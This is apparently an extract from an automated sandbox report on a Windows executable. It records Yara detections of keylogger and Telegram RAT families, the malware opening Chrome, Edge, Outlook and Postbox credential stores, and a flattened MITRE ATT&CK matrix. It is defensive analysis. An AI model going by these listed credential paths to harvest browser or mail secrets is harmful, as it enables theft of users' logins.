            Source: Yara matchFile source: Process Memory Space: Justificante67ab404ffe31b359e00a499e656454545.exe PID: 6392, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeDirectory queried: number of queries: 1001
            Source: Yara matchFile source: 00000004.00000002.2954634470.0000000032E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Justificante67ab404ffe31b359e00a499e656454545.exe PID: 6392, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000004.00000002.2954634470.0000000032D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Justificante67ab404ffe31b359e00a499e656454545.exe PID: 6392, type: MEMORYSTR
            Yara detected VIP Keylogger
            Source: Yara matchFile source: 00000004.00000002.2954634470.0000000032F11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		12
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation            		NTDS1
            System Network Configuration Discovery            		Distributed Component Object Model1
            Clipboard Data            		4
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection            		LSA Secrets14
            File and Directory Discovery            		SSHKeylogging15
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials215
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.